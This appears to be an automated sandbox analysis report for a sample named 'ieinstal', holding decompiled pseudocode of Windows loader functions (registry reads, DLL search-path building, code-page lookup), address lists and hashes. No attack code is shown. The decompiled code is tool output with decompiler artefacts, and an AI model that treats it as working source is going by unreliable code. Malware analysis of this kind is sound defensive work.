0x1f0325da
0x1f0325dc
0x00000000
0x00000000
0x1f0325e1
0x00000000
0x1eff2e18
0x1eff2e18
0x1eff2e22
0x1f0325cd
0x00000000
0x1f0325cd
0x1eff2e3b
0x1eff2e3f
0x1eff2eb1
0x00000000
0x1eff2eb1
0x1eff2e41
0x1eff2e44
0x1eff2e4a
0x1eff2e50
0x1eff2e56
0x1eff2e5a
0x1eff2e66
0x1eff2e77
0x1eff2e7c
0x1eff2e85
0x1eff2e92
0x1eff2e98
0x1eff2e9a
0x1eff2e9c
0x1eff2e9c
0x1eff2e9e
0x00000000
0x1eff2e9e
0x1eff2e01

Strings

RtlpInsertAssemblyStorageMapEntry, xrefs: 1F032611
SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 1F032616

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
API String ID: 0-2104531740
Opcode ID: 1fb867ceceb4c001b3d81743386e4f86b8d10391a96f95dc20197d171b039dd7
Instruction ID: fb4c17385f996884414c7661f8b652dfbe587ce88670ad6a752dac3ecdd5e6d0
Opcode Fuzzy Hash: 1fb867ceceb4c001b3d81743386e4f86b8d10391a96f95dc20197d171b039dd7
Instruction Fuzzy Hash: 4741D376A00211EFDB14CF55C860EAAB7B5FF94B11F21816AED849B250E730EE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1F000F16 Relevance: 2.6, Strings: 2, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E1F000F16(void* __ecx, intOrPtr* _a4) {
				signed int _v12;
				char _v16;
				char _v24;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char* _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _t52;
				void* _t53;
				void* _t54;

				_t49 = __ecx;
				_v12 = _v12 | 0xffffffff;
				_t52 = 0;
				_t48 = E1EFD5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x1000);
				if(_t25 == 0) {
					return 0xc0000017;
				}
				E1F005050(_t49,  &_v24, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control");
				_v56 = 0x18;
				_v48 =  &_v24;
				_push( &_v56);
				_push(0x20019);
				_v52 = 0;
				_push( &_v12);
				_v44 = 0x40;
				_v40 = 0;
				_v36 = 0;
				_t54 = E1F002AB0();
				if(_t54 >= 0) {
					_t53 = E1EFD5D90(_t49,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x10);
					if(_t53 == 0) {
						_t54 = 0xc0000017;
						_t52 = 0;
					} else {
						E1F001291(_t48);
						E1F005050(_t48,  &_v32, _t48);
						_push( &_v16);
						_push(0x10);
						_push(_t53);
						_push(2);
						_push( &_v32);
						_push(_v12);
						_t54 = E1F002B00();
						if(_t54 >= 0) {
							 *_a4 =  *((intOrPtr*)(_t53 + 0xc));
						}
						_t52 = 0;
						E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
					}
					_push(_v12);
					E1F002A80();
				}
				E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t48);
				return _t54;
			}

0x1f000f16
0x1f000f24
0x1f000f30
0x1f000f3b
0x1f000f3f
0x00000000
0x1f03998c
0x1f000f4e
0x1f000f56
0x1f000f5d
0x1f000f63
0x1f000f64
0x1f000f6c
0x1f000f6f
0x1f000f70
0x1f000f77
0x1f000f7a
0x1f000f82
0x1f000f86
0x1f000f99
0x1f000f9d
0x1f001005
0x1f00100a
0x1f000f9f
0x1f000fa4
0x1f000fae
0x1f000fb6
0x1f000fb7
0x1f000fb9
0x1f000fba
0x1f000fbf
0x1f000fc0
0x1f000fc8
0x1f000fcc
0x1f03999c
0x1f03999c
0x1f000fd9
0x1f000fdf
0x1f000fdf
0x1f000fe4
0x1f000fe7
0x1f000fe7
0x1f000ff7
0x00000000

Strings

\Registry\Machine\System\CurrentControlSet\Control, xrefs: 1F000F45
@, xrefs: 1F000F70

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: @$\Registry\Machine\System\CurrentControlSet\Control
API String ID: 0-2976085014
Opcode ID: bce54f57bf20c17acb92e0b829ff5ba57e2d071229f7a035634f5a5c3dcbabf5
Instruction ID: d7fbaa55b860e97c68b2f48bed9a55331d8904a0a2efd6b5933758fa27361cd0
Opcode Fuzzy Hash: bce54f57bf20c17acb92e0b829ff5ba57e2d071229f7a035634f5a5c3dcbabf5
Instruction Fuzzy Hash: 4E318476900689ABDB12EFA5CC54F9FBBB9EB84750F010525F904A7250DB34ED05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1EFC2EE8 Relevance: 1.7, Strings: 1, Instructions: 410
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E1EFC2EE8(intOrPtr __ecx, signed int __edx, void* _a4, char _a8) {
				signed int _v8;
				unsigned int _v28;
				void _v32;
				char _v33;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* _t150;
				signed int _t165;
				signed int _t171;
				signed int _t182;
				signed int _t184;
				signed int _t185;
				signed int _t194;
				signed int _t205;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t210;
				void* _t211;

				_v8 =  *0x1f0bb370 ^ _t209;
				_v68 = __ecx;
				_v56 = __edx;
				_t199 = 0;
				_v88 = 0;
				_v72 = 0;
				_v84 = 0;
				_v80 = 0;
				_v52 = 0;
				_v33 = 0;
				_t185 = 0x50;
				_v60 = 0;
				_v76 = 0;
				_v44 = 0;
				_push(6);
				_t150 = memcpy( &_v32, 0x1f0b92e8, 0 << 2);
				_t211 = _t210 + 0xc;
				_t207 = 0;
				_t205 = 0;
				_t192 = _v28 >> 0x0000001c & 0x00000003;
				_v64 = _t150;
				_v48 = 0;
				_v40 = _v28 >> 0x0000001c & 0x00000003;
				if(_v56 <= 0) {
					L32:
					_t58 = _t185 - 0x50; // 0x0
					if(_t58 <= 0xfffe) {
						L36:
						_t207 = E1EFD5D90(_t192,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t207, _t185);
						_v60 = _t207;
						if(_t207 != 0) {
							_t63 = _t207 + 0x50; // 0x50
							_t205 = _t63;
							 *(_t207 + 0x44) = _t185;
							 *((intOrPtr*)(_t207 + 0x38)) = 0;
							_t185 = 0;
							 *((intOrPtr*)(_t207 + 0x3c)) = 0;
							 *((intOrPtr*)(_t207 + 0x40)) = 0;
							 *(_t207 + 0x4c) = 0;
							_t199 = _v44;
							 *((short*)(_t207 + 0x30)) = _v56;
							if(_t199 != 0) {
								 *(_t207 + 0x18) = _t205;
								 *_t207 = ((0 | _t199 == 0x1f0b6600) - 0x00000001 & 0xfffffffb) + 7;
								E1F0088C0(_t205,  *((intOrPtr*)(_t199 + 4)),  *_t199 & 0x0000ffff);
								_t199 = _v44;
								_t211 = _t211 + 0xc;
								_t185 = 1;
								_t205 = _t205 + (( *_t199 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t182 = E1F04D07E(_v33, _t205);
									_t199 = _v44;
									_t205 = _t182;
								}
							}
							_t194 = 0;
							_v40 = 0;
							if(_v56 <= 0) {
								L67:
								_t208 = _v76;
								 *((short*)(_t205 - 2)) = 0;
								L68:
								_t155 = _v80;
								if(_v80 != 0) {
									E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t155);
								}
								_t156 = _v60;
								if(_v60 != 0 && _t208 < 0) {
									E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t156);
									_t156 = 0;
								}
								L73:
								return E1F004B50(_t156, _t185, _v8 ^ _t209, _t199, _t205, _t208);
							} else {
								_t185 = _t207 + _t185 * 4;
								_v64 = _t185;
								do {
									if(_t199 == 0) {
										L46:
										 *_t185 =  *(_v68 + _t194 * 4);
										 *(_t185 + 0x18) = _t205;
										_t165 =  *(_v68 + _t194 * 4);
										if(_t165 > 8) {
											L35:
											_t192 = 0x25;
											asm("int 0x29");
											goto L36;
										}
										switch( *((intOrPtr*)(_t165 * 4 +  &M1EFC3428))) {
											case 0:
												__ax =  *0x1f0b6610;
												__eflags = __ax;
												if(__ax == 0) {
													goto L65;
												}
												__ax & 0x0000ffff = E1F0088C0(__edi,  *0x1f0b6614, __ax & 0x0000ffff);
												__eax =  *0x1f0b6610 & 0x0000ffff;
												goto L51;
											case 1:
												L56:
												__eax = E1F0088C0(__edi, _v88, _v72);
												__eax = _v72;
												goto L51;
											case 2:
												 *0x1f0b6608 & 0x0000ffff = E1F0088C0(__edi,  *0x1f0b660c,  *0x1f0b6608 & 0x0000ffff);
												__eax =  *0x1f0b6608 & 0x0000ffff;
												__eax = ( *0x1f0b6608 & 0x0000ffff) >> 1;
												__edi = __edi + __eax * 2;
												goto L53;
											case 3:
												__eax = _v52;
												__eflags = __eax;
												if(__eax == 0) {
													goto L65;
												}
												__esi = __eax + __eax;
												__eax = E1F0088C0(__edi, _v80, __esi);
												__edi = __edi + __esi;
												__esi = _v60;
												goto L52;
											case 4:
												_push(0x2e);
												_pop(_t166);
												 *(_t207 + 0x4c) = _t205;
												 *_t205 = _t166;
												_t205 = _t205 + 4;
												_push(0x3b);
												_pop(_t167);
												 *((short*)(_t205 - 2)) = _t167;
												goto L65;
											case 5:
												__eflags = _v48;
												if(_v48 == 0) {
													goto L56;
												}
												__eax = E1F0088C0(__edi, _v84, _v48);
												__eax = _v48;
												L51:
												__eax = __eax >> 1;
												__esp = __esp + 0xc;
												__edi = __edi + __eax * 2;
												__edi = __edi + 2;
												__eflags = __edi;
												L52:
												_push(0x3b);
												_pop(__eax);
												 *(__edi - 2) = __ax;
												goto L53;
											case 6:
												__ebx =  *0x1f0b33d8;
												__eflags = __ebx - 0x1f0b33d8;
												if(__ebx == 0x1f0b33d8) {
													L64:
													__ebx = _v64;
													goto L65;
												}
												_push(0x3b);
												_pop(__esi);
												do {
													__eax =  *(__ebx + 8) & 0x0000ffff;
													_t119 = __ebx + 0xa; // 0x772533e2
													_t119 = E1F0088C0(__edi, _t119,  *(__ebx + 8) & 0x0000ffff);
													__eax =  *(__ebx + 8) & 0x0000ffff;
													__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													 *(__edi - 2) = __si;
													__ebx =  *__ebx;
													__eflags = __ebx - 0x1f0b33d8;
												} while (__ebx != 0x1f0b33d8);
												__esi = _v60;
												__ecx = _v40;
												__edx = _v44;
												goto L64;
											case 7:
												 *0x1f0b6600 & 0x0000ffff = E1F0088C0(__edi,  *0x1f0b6604,  *0x1f0b6600 & 0x0000ffff);
												__eax =  *0x1f0b6600 & 0x0000ffff;
												__eax = ( *0x1f0b6600 & 0x0000ffff) >> 1;
												__eflags = _a8;
												__edi = __edi + __eax * 2;
												if(_a8 != 0) {
													__cl = _v33;
													__edx = __edi;
													__eax = E1F04D07E(__ecx, __edi);
													__edi = __eax;
												}
												goto L53;
											case 8:
												__eflags =  *0x1f0b4ff8;
												if( *0x1f0b4ff8 == 0) {
													L65:
													_t185 = _t185 + 4;
													__eflags = _t185;
													_v64 = _t185;
													goto L66;
												}
												__eax = 0;
												 *(__edi - 2) = __ax;
												 *0x1f0b4ff8 & 0x0000ffff = E1F0088C0(__edi,  *0x1f0b4ffc,  *0x1f0b4ff8 & 0x0000ffff);
												__eax =  *0x1f0b690c; // 0x0
												 *(__esi + 0x40) = __edi;
												 *(__esi + 0x3c) = __eax;
												__eax =  *0x1f0b4ff8 & 0x0000ffff;
												__eax = ( *0x1f0b4ff8 & 0x0000ffff) >> 1;
												__edi = __edi + __eax * 2;
												__edi = __edi + 2;
												L53:
												__ecx = _v40;
												__edx = _v44;
												goto L65;
										}
									}
									_t171 =  *(_v68 + _t194 * 4);
									if(_t171 == 0) {
										goto L66;
									}
									if(_t171 == 5) {
										goto L66;
									}
									goto L46;
									L66:
									_t194 = _t194 + 1;
									_v40 = _t194;
								} while (_t194 < _v56);
								goto L67;
							}
						}
						_t208 = 0xc0000017;
						goto L68;
					}
					_t208 = 0xc0000106;
					goto L68;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t184 =  *(_v68 + _t205 * 4);
					if(_t184 > 8) {
						goto L35;
					}
					switch( *((intOrPtr*)(_t184 * 4 +  &M1EFC3404))) {
						case 0:
							__ax =  *0x1f0b6610;
							goto L28;
						case 1:
							L9:
							__edx =  &_v72;
							__ecx = 0;
							__eax = E1EFC344C(0,  &_v72);
							_v72 = _v72 + 2;
							_v88 = __eax;
							__ebx = __ebx + _v72 + 2;
							__eflags = __ebx;
							goto L10;
						case 2:
							__eax =  *0x1f0b6608 & 0x0000ffff;
							__ebx = __ebx + __eax;
							__eflags = __cl - 1;
							if(__cl != 1) {
								goto L31;
							} else {
								__eax = 0x1f0b6608;
								goto L13;
							}
						case 3:
							E1EFCFED0(0x1f0b5b40) =  &_v52;
							__esi = E1EFCF870(__esi, L"PATH", 4, __esi, __esi,  &_v52);
							_v76 = __esi;
							__eflags = __esi - 0xc0000023;
							if(__esi != 0xc0000023) {
								L17:
								_push(0x1f0b5b40);
								__eax = E1EFCE740(__ecx);
								__eflags = __esi - 0xc0000100;
								if(__esi != 0xc0000100) {
									__eflags = __esi;
									if(__esi < 0) {
										goto L68;
									}
									__eax = _v52;
									__edx = _v48;
									__ecx = _v40;
									__ebx = __ebx + __eax * 2;
									__ebx = __ebx + 2;
									__esi = 0;
									goto L31;
								}
								__esi = 0;
								_v52 = 0;
								_v76 = 0;
								L10:
								__edx = _v48;
								__ecx = _v40;
								goto L31;
							}
							__eax = _v52;
							__ecx =  *0x1f0b5d78; // 0x0
							_v52 + _v52 =  *[fs:0x30];
							__ecx = __ecx + 0x180000;
							__eax = E1EFD5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
							_v80 = __eax;
							__eflags = __eax;
							if(__eax == 0) {
								_push(0x1f0b5b40);
								__eax = E1EFCE740(__ecx);
								__eax = _v60;
								goto L73;
							}
							__ecx =  &_v52;
							__eax = E1EFCF870(0, L"PATH", 4, __eax, _v52,  &_v52);
							__esi = __eax;
							_v76 = __eax;
							goto L17;
						case 4:
							_t185 = _t185 + 4;
							goto L31;
						case 5:
							__eax = _v64;
							__eflags = __eax;
							if(__eax != 0) {
								__edx =  &_v48;
								__ecx = __eax;
								__eax = E1EFC344C(__eax,  &_v48);
								__edx = _v48;
								__ecx = _v40;
								_v84 = __eax;
							}
							__eflags = __edx;
							if(__edx == 0) {
								goto L9;
							} else {
								__ebx = __ebx + 2;
								__ebx = __ebx + __edx;
								goto L31;
							}
						case 6:
							__eax =  *0x1f0b33e0 & 0x0000ffff;
							goto L30;
						case 7:
							__ecx =  *0x1f0b6600 & 0x0000ffff;
							__ebx = __ebx + __ecx;
							__eflags = _a8;
							if(__eflags != 0) {
								__eax =  *0x1f0b391c; // 0x16
								__eax = __eax & 0x00000100;
								_v33 = __eflags != 0;
								__ebx = __ebx + 0x16;
								__ebx = __ebx + __ecx;
								__eflags = __eax;
								if(__eax != 0) {
									__ebx = __ebx + 0x1e;
									__ebx = __ebx + __ecx;
									__eflags = __ebx;
								}
							}
							__ecx = _v40;
							__eflags = __cl - 1;
							if(__cl == 1) {
								__eax = 0x1f0b6600;
								L13:
								_v44 = __eax;
							}
							goto L31;
						case 8:
							__ax =  *0x1f0b4ff8;
							L28:
							__eflags = __ax;
							if(__ax == 0) {
								L31:
								_t205 = _t205 + 1;
								if(_t205 < _v56) {
									goto L1;
								}
								goto L32;
							}
							__eax = __ax & 0x0000ffff;
							__eax = (__ax & 0x0000ffff) + 2;
							__eflags = __eax;
							L30:
							__ebx = __ebx + __eax;
							__eflags = __ebx;
							goto L31;
					}
				}
				goto L35;
			}

0x1efc2ef7
0x1efc2f00
0x1efc2f08
0x1efc2f0d
0x1efc2f0f
0x1efc2f12
0x1efc2f1a
0x1efc2f1d
0x1efc2f20
0x1efc2f23
0x1efc2f26
0x1efc2f27
0x1efc2f2a
0x1efc2f2d
0x1efc2f30
0x1efc2f33
0x1efc2f33
0x1efc2f38
0x1efc2f3d
0x1efc2f3f
0x1efc2f42
0x1efc2f45
0x1efc2f48
0x1efc2f4e
0x1efc30f8
0x1efc30f8
0x1efc3100
0x1efc3123
0x1efc3133
0x1efc3135
0x1efc313a
0x1efc3149
0x1efc3149
0x1efc314e
0x1efc3151
0x1efc3154
0x1efc3156
0x1efc3159
0x1efc315c
0x1efc315f
0x1efc3162
0x1efc3168
0x1efc316c
0x1efc317f
0x1efc3189
0x1efc318e
0x1efc3191
0x1efc3194
0x1efc319e
0x1efc31a1
0x1efc31a8
0x1efc31ad
0x1efc31b0
0x1efc31b0
0x1efc31a1
0x1efc31b2
0x1efc31b4
0x1efc31ba
0x1efc3329
0x1efc3329
0x1efc332e
0x1efc3332
0x1efc3332
0x1efc3337
0x1efc3345
0x1efc3345
0x1efc334a
0x1efc334f
0x1efc3361
0x1efc3366
0x1efc3366
0x1efc3368
0x1efc3376
0x1efc31c0
0x1efc31c0
0x1efc31c3
0x1efc31c6
0x1efc31c8
0x1efc31e3
0x1efc31e9
0x1efc31ee
0x1efc31f1
0x1efc31f7
0x1efc311e
0x1efc3120
0x1efc3121
0x00000000
0x1efc3121
0x1efc31fd
0x00000000
0x1efc321c
0x1efc3222
0x1efc3225
0x00000000
0x00000000
0x1efc3236
0x1efc323b
0x00000000
0x00000000
0x1efc3276
0x1efc327d
0x1efc3282
0x00000000
0x00000000
0x1efc3296
0x1efc329b
0x1efc32a5
0x1efc32a7
0x00000000
0x00000000
0x1efc32ac
0x1efc32af
0x1efc32b1
0x00000000
0x00000000
0x1efc32b3
0x1efc32bb
0x1efc32c6
0x1efc32c8
0x00000000
0x00000000
0x1efc3204
0x1efc3206
0x1efc3207
0x1efc320a
0x1efc320d
0x1efc3210
0x1efc3212
0x1efc3213
0x00000000
0x00000000
0x1efc325f
0x1efc3263
0x00000000
0x00000000
0x1efc326c
0x1efc3271
0x1efc3242
0x1efc3242
0x1efc3244
0x1efc3247
0x1efc324a
0x1efc324a
0x1efc324d
0x1efc324d
0x1efc324f
0x1efc3250
0x00000000
0x00000000
0x1efc32cd
0x1efc32d3
0x1efc32d9
0x1efc3313
0x1efc3313
0x00000000
0x1efc3313
0x1efc32db
0x1efc32dd
0x1efc32de
0x1efc32de
0x1efc32e3
0x1efc32e8
0x1efc32ed
0x1efc32f4
0x1efc32f6
0x1efc32f9
0x1efc32fc
0x1efc3300
0x1efc3302
0x1efc3302
0x1efc330a
0x1efc330d
0x1efc3310
0x00000000
0x00000000
0x1efc3388
0x1efc338d
0x1efc3397
0x1efc3399
0x1efc339d
0x1efc33a0
0x1efc33a6
0x1efc33a9
0x1efc33ab
0x1efc33b0
0x1efc33b0
0x00000000
0x00000000
0x1efc33b7
0x1efc33bf
0x1efc3316
0x1efc3316
0x1efc3316
0x1efc3319
0x00000000
0x1efc3319
0x1efc33c5
0x1efc33c7
0x1efc33da
0x1efc33df
0x1efc33e7
0x1efc33ea
0x1efc33ed
0x1efc33f4
0x1efc33f6
0x1efc33f9
0x1efc3254
0x1efc3254
0x1efc3257
0x00000000
0x00000000
0x1efc31fd
0x1efc31d1
0x1efc31d4
0x00000000
0x00000000
0x1efc31dd
0x00000000
0x00000000
0x00000000
0x1efc331c
0x1efc331c
0x1efc331d
0x1efc3320
0x00000000
0x1efc31c6
0x1efc31ba
0x1efc313c
0x00000000
0x1efc313c
0x1efc3102
0x00000000
0x00000000
0x00000000
0x00000000
0x1efc2f54
0x1efc2f54
0x1efc2f57
0x1efc2f5d
0x00000000
0x00000000
0x1efc2f63
0x00000000
0x1efc2f72
0x00000000
0x00000000
0x1efc2fa5
0x1efc2fa5
0x1efc2fa8
0x1efc2faa
0x1efc2fb2
0x1efc2fb5
0x1efc2fb8
0x1efc2fb8
0x00000000
0x00000000
0x1efc2fc5
0x1efc2fcc
0x1efc2fce
0x1efc2fd1
0x00000000
0x1efc2fd7
0x1efc2fd7
0x00000000
0x1efc2fd7
0x00000000
0x1efc2fee
0x1efc3001
0x1efc3003
0x1efc3006
0x1efc300c
0x1efc3055
0x1efc3055
0x1efc305a
0x1efc305f
0x1efc3065
0x1efc3074
0x1efc3076
0x00000000
0x00000000
0x1efc307c
0x1efc307f
0x1efc3082
0x1efc3085
0x1efc3088
0x1efc308b
0x00000000
0x1efc308b
0x1efc3067
0x1efc3069
0x1efc306c
0x1efc2fba
0x1efc2fba
0x1efc2fbd
0x00000000
0x1efc2fbd
0x1efc300e
0x1efc3011
0x1efc301a
0x1efc3020
0x1efc302a
0x1efc302f
0x1efc3032
0x1efc3034
0x1efc310c
0x1efc3111
0x1efc3116
0x00000000
0x1efc3116
0x1efc303a
0x1efc304b
0x1efc3050
0x1efc3052
0x00000000
0x00000000
0x1efc2f6a
0x00000000
0x00000000
0x1efc2f7d
0x1efc2f80
0x1efc2f82
0x1efc2f84
0x1efc2f87
0x1efc2f89
0x1efc2f8e
0x1efc2f91
0x1efc2f94
0x1efc2f94
0x1efc2f97
0x1efc2f99
0x00000000
0x1efc2f9b
0x1efc2f9b
0x1efc2f9e
0x00000000
0x1efc2f9e
0x00000000
0x1efc308f
0x00000000
0x00000000
0x1efc3098
0x1efc309f
0x1efc30a1
0x1efc30a5
0x1efc30a7
0x1efc30ac
0x1efc30b1
0x1efc30b5
0x1efc30b8
0x1efc30ba
0x1efc30bc
0x1efc30c1
0x1efc30c4
0x1efc30c4
0x1efc30c6
0x1efc30bc
0x1efc30c9
0x1efc30cc
0x1efc30cf
0x1efc30d1
0x1efc2fdc
0x1efc2fdc
0x1efc2fdc
0x00000000
0x00000000
0x1efc30db
0x1efc30e1
0x1efc30e1
0x1efc30e4
0x1efc30ee
0x1efc30ee
0x1efc30f2
0x00000000
0x00000000
0x00000000
0x1efc30f2
0x1efc30e6
0x1efc30e9
0x1efc30e9
0x1efc30ec
0x1efc30ec
0x1efc30ec
0x00000000
0x00000000
0x1efc2f63
0x00000000

Strings

PATH, xrefs: 1EFC2FF6, 1EFC3044

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: d47cd32800eb4e54b11eeb512c007f5d292f4752eac57610e0b55e477ee020d2
Instruction ID: 57b1851a85c8fbe640222873e0ff3fc3fa2493814167b2af941ed29119182bd6
Opcode Fuzzy Hash: d47cd32800eb4e54b11eeb512c007f5d292f4752eac57610e0b55e477ee020d2
Instruction Fuzzy Hash: EFF1B376E0121ADFCB14DF99C8A0EEEB7F1FF48750F254169E844AB240D732AA51CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1EFBCD8A Relevance: 1.4, Strings: 1, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1EFBCD8A(intOrPtr __ecx, void* __edx, void* __eflags) {
				unsigned int _v8;
				char _v12;
				char _v16;
				unsigned int _v20;
				unsigned int _v24;
				intOrPtr _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t42;
				signed int _t45;
				unsigned int _t49;
				signed int _t50;
				signed int _t56;
				void* _t57;
				intOrPtr _t60;
				intOrPtr _t62;
				signed int _t64;
				signed int _t67;
				unsigned int _t68;
				signed int _t70;
				intOrPtr _t72;
				signed int _t74;
				signed int _t75;
				signed int _t76;
				signed int _t78;
				void* _t82;
				intOrPtr _t85;
				signed int _t86;
				void* _t87;
				signed int _t88;

				_t86 = 0;
				_v12 = 7;
				_v24 = 0;
				_t62 = __ecx;
				_v20 = 0;
				_t87 = __edx;
				_v28 = __ecx;
				_v8 = 0;
				_v16 = 0;
				E1F005050(__ecx,  &_v36, L"AlternateCodePage");
				_push(__ecx);
				_t42 = E1EFBD64A(_t87,  &_v36,  &_v12, 0,  &_v8);
				if(_t42 != 0xc0000034) {
					_t67 = _v8;
					__eflags = _t67;
					if(_t67 == 0) {
						goto L1;
					}
					__eflags = _t42 - 0x80000005;
					if(_t42 != 0x80000005) {
						goto L1;
					}
					_t68 = _t67 + 2;
					_v8 = _t68;
					_t70 = _t68 + 0x00000003 & 0xfffffffc;
					__eflags = _t70;
					if(_t70 != 0) {
						_t42 = E1EFD5D90(_t70,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t70);
						_t86 = _t42;
					}
					__eflags = _t86;
					if(_t86 == 0) {
						goto L1;
					}
					_push(_t70);
					_t45 = E1EFBD64A(_t87,  &_v36,  &_v12, _t86,  &_v8);
					__eflags = _t45;
					if(_t45 != 0) {
						L22:
						return E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t86);
					}
					__eflags = _v12 - 1;
					if(_v12 == 1) {
						L10:
						_t88 = _t86;
						_t49 = _v8 >> 1;
						__eflags = _t49;
						_t72 = 0;
						_v8 = _t49;
						_v12 = _t72;
						if(_t49 == 0) {
							goto L22;
						}
						_t64 = _t62 + 0x14;
						__eflags = _t64;
						while(1) {
							__eflags = _t88;
							if(_t88 == 0) {
								goto L22;
							}
							__eflags =  *_t88 - _t72;
							if( *_t88 == _t72) {
								goto L22;
							}
							_t50 = E1F0079A0(_t88, "*");
							_pop(_t74);
							__eflags = _t50;
							if(_t50 == 0) {
								_t75 = _t74 | 0xffffffff;
								__eflags = _t75;
								 *(_v28 + 0x14) = _t75;
								goto L22;
							}
							E1F005050(_t74,  &_v36, _t88);
							_push( &_v16);
							_push(0xa);
							_push( &_v36);
							_t56 = E1EFF07D0(_t64, _t86, _t88, __eflags);
							__eflags = _t56;
							if(_t56 != 0) {
								L17:
								_t76 = _t88;
								_t28 = _t76 + 2; // 0x2
								_t82 = _t28;
								do {
									_t57 =  *_t76;
									_t76 = _t76 + 2;
									__eflags = _t57 - _v24;
								} while (_t57 != _v24);
								_t78 = _t76 - _t82 >> 1;
								_t85 = _v12 + 1 + _t78;
								_v12 = _t85;
								_t88 = _t88 + _t78 * 2 + 2;
								_t72 = 0;
								__eflags = _t85 - _v8;
								if(_t85 < _v8) {
									continue;
								}
								goto L22;
							}
							 *_t64 = _v16;
							_t64 = _t64 + 2;
							_t60 = _v20 + 1;
							_v20 = _t60;
							__eflags = _t60 - 4;
							if(_t60 >= 4) {
								goto L22;
							}
							goto L17;
						}
						goto L22;
					}
					__eflags = _v12 - 7;
					if(_v12 != 7) {
						goto L22;
					}
					goto L10;
				}
				L1:
				return _t42;
			}

0x1efbcd95
0x1efbcd97
0x1efbcda6
0x1efbcda9
0x1efbcdab
0x1efbcdaf
0x1efbcdb1
0x1efbcdb4
0x1efbcdb7
0x1efbcdba
0x1efbcdbf
0x1efbcdce
0x1efbcdd8
0x1f01a275
0x1f01a278
0x1f01a27a
0x00000000
0x00000000
0x1f01a280
0x1f01a285
0x00000000
0x00000000
0x1f01a28b
0x1f01a28e
0x1f01a294
0x1f01a294
0x1f01a297
0x1f01a2a5
0x1f01a2aa
0x1f01a2aa
0x1f01a2ac
0x1f01a2ae
0x00000000
0x00000000
0x1f01a2b4
0x1f01a2c3
0x1f01a2c8
0x1f01a2ca
0x1f01a382
0x00000000
0x1f01a38f
0x1f01a2d0
0x1f01a2d4
0x1f01a2e0
0x1f01a2e3
0x1f01a2e7
0x1f01a2e7
0x1f01a2e9
0x1f01a2ea
0x1f01a2ed
0x1f01a2f0
0x00000000
0x00000000
0x1f01a2f6
0x1f01a2f6
0x1f01a2f9
0x1f01a2f9
0x1f01a2fb
0x00000000
0x00000000
0x1f01a301
0x1f01a304
0x00000000
0x00000000
0x1f01a30c
0x1f01a312
0x1f01a313
0x1f01a315
0x1f01a37b
0x1f01a37b
0x1f01a37e
0x00000000
0x1f01a37e
0x1f01a31c
0x1f01a324
0x1f01a325
0x1f01a32a
0x1f01a32b
0x1f01a330
0x1f01a332
0x1f01a34a
